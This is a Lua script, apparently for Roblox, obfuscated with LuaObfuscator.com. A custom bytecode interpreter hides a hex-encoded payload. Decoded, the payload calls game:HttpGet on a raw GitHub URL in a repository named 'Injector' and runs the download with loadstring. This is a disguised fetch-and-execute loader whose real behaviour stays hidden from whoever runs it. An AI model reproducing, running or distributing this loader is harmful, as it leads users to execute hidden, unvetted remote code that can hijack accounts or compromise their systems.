--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v81=v2(v0(v30,16));if v19 then local v88=v5(v81,v19);v19=nil;return v88;else return v81;end end end);local function v20(v31,v32,v33) if v33 then local v82=(v31/((5 -3)^(v32-((879 -(282 + 595)) -1))))%((3 -1)^(((v33-((1639 -(1523 + 114)) -1)) -(v32-(620 -(555 + 58 + 6)))) + (932 -(857 + 74)))) ;return v82-(v82%(569 -(367 + 201))) ;else local v83=0;local v84;while true do if (v83==(927 -(214 + 713))) then v84=2^(v32-(1 + 0)) ;return (((v31%(v84 + v84))>=v84) and (1 + 0)) or (0 -0) ;end end end end local function v21() local v34=117 -(32 + 85) ;local v35;while true do if (v34==1) then return v35;end if (v34==(1065 -(68 + 997))) then v35=v1(v16,v18,v18);v18=v18 + ((2228 -(892 + 65)) -((538 -312) + 1044)) ;v34=4 -3 ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (3 -1) );v18=v18 + 2 ;return (v37 * (469 -213)) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (353 -(87 + 263)) );v18=v18 + 4 ;return (v41 * ((12338973 + 4438423) -(67 + 113))) + (v40 * ((190997 -142941) + 17480)) + (v39 * ((1580 -(802 + 150)) -372)) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=2 -1 ;local v45=(v20(v43,1 -0 ,15 + 5 ) * ((999 -((1353 -(145 + 293)) + 82))^(90 -58))) + v42 ;local v46=v20(v43,13 + 3 + 5 ,40 -(8 + 1) );local v47=((v20(v43,1219 -(1069 + 118) )==(2 -1)) and  -(1 -0)) or 1 ;if (v46==((430 -(44 + 386)) + 0)) then if (v45==(0 -0)) then return v47 * (0 + 0) ;else v46=792 -(368 + 423) ;v44=0 -(1486 -(998 + 488)) ;end elseif (v46==(2065 -(10 + 8))) then return ((v45==((0 -0) -0)) and (v47 * ((443 -(416 + 16 + 10))/0))) or (v47 * NaN) ;end return v8(v47,v46-((11923 -8657) -2243) ) * (v44 + (v45/((1 + 1)^(91 -39)))) ;end local function v25(v48) local v49=0 -(0 + 0) ;local v50;local v51;while true do if (v49==(862 -(814 + 45))) then return v6(v51);end if (v49==0) then v50=nil;if  not v48 then v48=v23();if (v48==((3915 -2492) -(630 + 793))) then return "";end end v49=3 -2 ;end if (v49==(4 -2)) then v51={};for v89=1 + 0 , #v50 do v51[v89]=v2(v1(v3(v50,v89,v89)));end v49=9 -6 ;end if (v49==((3 -2) + 0 + 0)) then v50=v3(v16,v18,(v18 + v48) -((1503 + 411) -(1789 + 124)) );v18=v18 + v48 ;v49=887 -(261 + 624) ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return 0;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do local v66=(function() return 0;end)();while true do if (v66~=0) then else local v91=(function() return 0 -0 ;end)();while true do if (v91==(286 -(134 + 151))) then v66=(function() return 1;end)();break;end if (v91==0) then if ((1667 -(970 + 695))==v52) then v59=(function() return {};end)();for v109= #"[",v58 do local v110=(function() return 0;end)();local v111=(function() return;end)();local v112=(function() return;end)();local v113=(function() return;end)();while true do if (v110==(1 -0)) then v113=(function() return nil;end)();while true do if (v111~=(1991 -(582 + 1408))) then else if (v112== #"{") then v113=(function() return v21()~=(0 -0) ;end)();elseif (v112==2) then v113=(function() return v24();end)();elseif (v112== #"19(") then v113=(function() return v25();end)();end v59[v109]=(function() return v113;end)();break;end if (v111==(0 -0)) then local v158=(function() return 0 -0 ;end)();while true do if (v158==(1825 -(1195 + 629))) then v111=(function() return 1 -0 ;end)();break;end if (v158==(241 -(187 + 54))) then v112=(function() return v21();end)();v113=(function() return nil;end)();v158=(function() return 781 -(162 + 618) ;end)();end end end end break;end if (v110==(0 + 0)) then v111=(function() return 0;end)();v112=(function() return nil;end)();v110=(function() return 1 + 0 ;end)();end end end v57[ #"xxx"]=(function() return v21();end)();v52=(function() return 6 -3 ;end)();end if (v52==3) then for v114= #":",v23() do local v115=(function() return 0;end)();local v116=(function() return;end)();while true do if ((0 -0)~=v115) then else v116=(function() return v21();end)();if (v20(v116, #"}", #">")~=0) then else local v153=(function() return 0;end)();local v154=(function() return;end)();local v155=(function() return;end)();local v156=(function() return;end)();while true do if (v153==(1 + 0)) then v156=(function() return {v22(),v22(),nil,nil};end)();if (v154==0) then local v162=(function() return 1636 -(1373 + 263) ;end)();local v163=(function() return;end)();while true do if (v162==(1000 -(451 + 549))) then v163=(function() return 0 + 0 ;end)();while true do if (v163==(0 -0)) then v156[ #"19("]=(function() return v22();end)();v156[ #".dev"]=(function() return v22();end)();break;end end break;end end elseif (v154== #"~") then v156[ #"19("]=(function() return v23();end)();elseif (v154==(2 -0)) then v156[ #"nil"]=(function() return v23() -((1386 -(746 + 638))^16) ;end)();elseif (v154~= #"-19") then else local v171=(function() return 0;end)();local v172=(function() return;end)();while true do if (v171~=0) then else v172=(function() return 0;end)();while true do if (v172~=(0 + 0)) then else v156[ #"-19"]=(function() return v23() -((2 -0)^(357 -(218 + 123))) ;end)();v156[ #".com"]=(function() return v22();end)();break;end end break;end end end v153=(function() return 2;end)();end if (v153==3) then if (v20(v155, #"-19", #"xnx")~= #"\\") then else v156[ #"asd1"]=(function() return v59[v156[ #".dev"]];end)();end v54[v114]=(function() return v156;end)();break;end if (v153==(1581 -(1535 + 46))) then local v160=(function() return 0;end)();local v161=(function() return;end)();while true do if (v160~=(0 + 0)) then else v161=(function() return 0;end)();while true do if (v161==0) then v154=(function() return v20(v116,2, #"asd");end)();v155=(function() return v20(v116, #"?id=",6);end)();v161=(function() return 1;end)();end if (v161~=(1 + 0)) then else v153=(function() return 561 -(306 + 254) ;end)();break;end end break;end end end if (v153~=2) then else if (v20(v155, #" ", #">")== #"[") then v156[2]=(function() return v59[v156[2]];end)();end if (v20(v155,1 + 1 ,3 -1 )~= #"[") then else v156[ #"19("]=(function() return v59[v156[ #"nil"]];end)();end v153=(function() return 3;end)();end end end break;end end end for v117= #"[",v23() do v55,v117,v28=(function() return v53(v55,v117,v28);end)();end return v57;end v91=(function() return 1468 -(899 + 568) ;end)();end end end if (v66~=1) then else if ((1 + 0)==v52) then local v96=(function() return 0;end)();while true do if (v96==1) then v58=(function() return v23();end)();v52=(function() return 4 -2 ;end)();break;end if (v96==(603 -(268 + 335))) then v56=(function() return {};end)();v57=(function() return {v54,v55,nil,v56};end)();v96=(function() return 291 -(60 + 230) ;end)();end end end if (v52==0) then v53=(function() return function(v97,v98,v99) local v100=(function() return 572 -(426 + 146) ;end)();while true do if (v100==(0 + 0)) then local v139=(function() return 0;end)();while true do if (v139==0) then v97[v98-#":" ]=(function() return v99();end)();return v97,v98,v99;end end end end end;end)();v54=(function() return {};end)();v55=(function() return {};end)();v52=(function() return 1457 -(282 + 1174) ;end)();end break;end end end end local function v29(v60,v61,v62) local v63=v60[812 -((1781 -(323 + 889)) + 242) ];local v64=v60[5 -3 ];local v65=v60[1 + 2 ];return function(...) local v67=v63;local v68=v64;local v69=v65;local v70=v27;local v71=2 -1 ;local v72= -(1025 -(706 + 318));local v73={};local v74={...};local v75=v12("#",...) -(1272 -(945 + 326)) ;local v76={};local v77={};for v85=0 -(580 -(361 + 219)) ,v75 do if (v85>=v69) then v73[v85-v69 ]=v74[v85 + 1 + 0 ];else v77[v85]=v74[v85 + (701 -(271 + (749 -(53 + 267)))) ];end end local v78=(v75-v69) + 1 + 0 + 0 ;local v79;local v80;while true do v79=v67[v71];v80=v79[1501 -(1408 + 92) ];if (v80<=6) then if ((v80<=2) or (1804>=3275)) then if (v80<=0) then v77[v79[1088 -(461 + 625) ]]=v79[1291 -(993 + 295) ];elseif ((v80>1) or (1417>3629)) then local v118=0;local v119;local v120;while true do if (v118==0) then v119=v79[1 + 1 ];v120=v77[v79[1174 -((831 -(15 + 398)) + 753) ]];v118=1 + 0 ;end if ((4795>402) and (v118==1)) then v77[v119 + 1 ]=v120;v77[v119]=v120[v79[1 + 3 ]];break;end end else v77[v79[2]]=v62[v79[1 + 2 ]];end elseif ((4813>3565) and (v80<=(2 + 2))) then if (v80>(985 -(18 + 964))) then do return;end else do return;end end elseif (v80>((2009 -1475) -(406 + 123))) then v77[v79[1771 -(1749 + 20) ]]();else local v123=v79[1 + 1 ];v77[v123]=v77[v123](v13(v77,v123 + ((766 + 557) -(787 + 462 + 73)) ,v72));end elseif ((3912==3912) and (v80<=((854 -(20 + 830)) + 5))) then if (v80<=(1152 -(466 + 679))) then local v103=v79[4 -2 ];local v104=v77[v79[8 -(4 + 1) ]];v77[v103 + (1901 -(106 + 1794)) ]=v104;v77[v103]=v104[v79[2 + 2 ]];elseif (v80==(3 + 5)) then v77[v79[5 -3 ]]();else local v125=v79[5 -3 ];v77[v125]=v77[v125](v13(v77,v125 + ((241 -(116 + 10)) -(4 + 110)) ,v72));end elseif (v80<=(595 -(57 + 527))) then if (v80==10) then v77[v79[1429 -(4 + 37 + 1386) ]]=v62[v79[106 -((755 -(542 + 196)) + 86) ]];else v77[v79[2]]=v79[3];end elseif (v80>12) then local v131=v79[2 + 0 ];local v132,v133=v70(v77[v131](v13(v77,v131 + (1 -0) ,v79[8 -5 ])));v72=(v133 + v131) -(167 -(122 + 44)) ;local v134=0 -0 ;for v140=v131,v72 do v134=v134 + (3 -2) ;v77[v140]=v132[v134];end else local v135=v79[2 + 0 ];local v136,v137=v70(v77[v135](v13(v77,v135 + 1 + 0 ,v79[3])));v72=(v137 + v135) -(1 -(0 -0)) ;local v138=65 -(30 + 11 + 24) ;for v143=v135,v72 do local v144=0 + 0 ;while true do if (0==v144) then v138=v138 + (1258 -(1043 + 214)) ;v77[v143]=v136[v138];break;end end end end v71=v71 + ((2 + 1) -2) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403513Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F62656E6564652Q74616572612F496E6A6563746F722F726566732F68656164732F6D61696E2F707269767465456E3200083Q0012013Q00013Q001201000100023Q00200700010001000300122Q000300044Q000C000100034Q00055Q00022Q00063Q000100012Q00043Q00017Q00",v9(),...);